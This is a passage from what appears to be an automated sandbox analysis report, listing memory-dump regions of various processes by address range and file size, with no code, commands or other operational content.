                                                                            • memory/4288-334-0x00000000009C0000-0x0000000000B0A000-memory.dmp
                                                                              Filesize

                                                                              1.3MB

                                                                            • memory/4332-390-0x0000000004D70000-0x0000000005376000-memory.dmp
                                                                              Filesize

                                                                              6.0MB

                                                                            • memory/4332-374-0x0000000000417DEE-mapping.dmp
                                                                            • memory/4380-398-0x0000000000000000-mapping.dmp
                                                                            • memory/4432-343-0x0000000000000000-mapping.dmp
                                                                            • memory/4448-393-0x0000000000000000-mapping.dmp
                                                                            • memory/4476-361-0x0000000000000000-mapping.dmp
                                                                            • memory/4492-239-0x0000000000000000-mapping.dmp
                                                                            • memory/4508-247-0x0000000000400000-0x00000000004E4000-memory.dmp
                                                                              Filesize

                                                                              912KB

                                                                            • memory/4508-240-0x0000000000000000-mapping.dmp
                                                                            • memory/4516-315-0x0000000000417E1A-mapping.dmp
                                                                            • memory/4516-314-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                              Filesize

                                                                              120KB

                                                                            • memory/4536-407-0x0000000000000000-mapping.dmp
                                                                            • memory/4652-251-0x0000000000000000-mapping.dmp
                                                                            • memory/4692-366-0x00000000008B0000-0x00000000008F7000-memory.dmp
                                                                              Filesize

                                                                              284KB

                                                                            • memory/4692-313-0x0000000000000000-mapping.dmp
                                                                            • memory/4700-306-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4700-257-0x0000000000000000-mapping.dmp
                                                                            • memory/4700-311-0x00000000058F0000-0x00000000058F1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4720-310-0x0000000005510000-0x0000000005511000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4720-274-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4720-259-0x0000000000000000-mapping.dmp
                                                                            • memory/4720-303-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4720-302-0x0000000005160000-0x0000000005766000-memory.dmp
                                                                              Filesize

                                                                              6.0MB

                                                                            • memory/4720-298-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4720-297-0x0000000005200000-0x0000000005201000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4720-294-0x0000000005770000-0x0000000005771000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4748-272-0x000001A9DC450000-0x000001A9DC451000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4748-261-0x0000000000000000-mapping.dmp
                                                                            • memory/4784-301-0x00000000056F0000-0x00000000056F1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4784-341-0x00000000057E0000-0x00000000057EF000-memory.dmp
                                                                              Filesize

                                                                              60KB

                                                                            • memory/4784-279-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/4784-262-0x0000000000000000-mapping.dmp
                                                                            • memory/4812-265-0x0000000000000000-mapping.dmp
                                                                            • memory/4912-385-0x00000000008F0000-0x000000000099E000-memory.dmp
                                                                              Filesize

                                                                              696KB

                                                                            • memory/4912-386-0x0000000000400000-0x00000000008EC000-memory.dmp
                                                                              Filesize

                                                                              4.9MB

                                                                            • memory/4912-316-0x0000000000000000-mapping.dmp
                                                                            • memory/4940-276-0x0000000000000000-mapping.dmp
                                                                            • memory/4948-275-0x0000000000000000-mapping.dmp
                                                                            • memory/4956-422-0x000001C9587A0000-0x000001C95880F000-memory.dmp
                                                                              Filesize

                                                                              444KB

                                                                            • memory/4956-424-0x000001C958810000-0x000001C9588E1000-memory.dmp
                                                                              Filesize

                                                                              836KB

                                                                            • memory/4956-277-0x0000000000000000-mapping.dmp
                                                                            • memory/4976-278-0x0000000000000000-mapping.dmp
                                                                            • memory/5000-403-0x0000000000000000-mapping.dmp
                                                                            • memory/5076-285-0x0000000000000000-mapping.dmp
                                                                            • memory/5080-410-0x0000000000000000-mapping.dmp
                                                                            • memory/5108-389-0x0000000005720000-0x0000000005D26000-memory.dmp
                                                                              Filesize

                                                                              6.0MB

                                                                            • memory/5108-372-0x0000000000417DFA-mapping.dmp
                                                                            • memory/5760-444-0x0000000000C50000-0x0000000000CAD000-memory.dmp
                                                                              Filesize

                                                                              372KB

                                                                            • memory/5760-442-0x0000000000CDD000-0x0000000000DDE000-memory.dmp
                                                                              Filesize

                                                                              1.0MB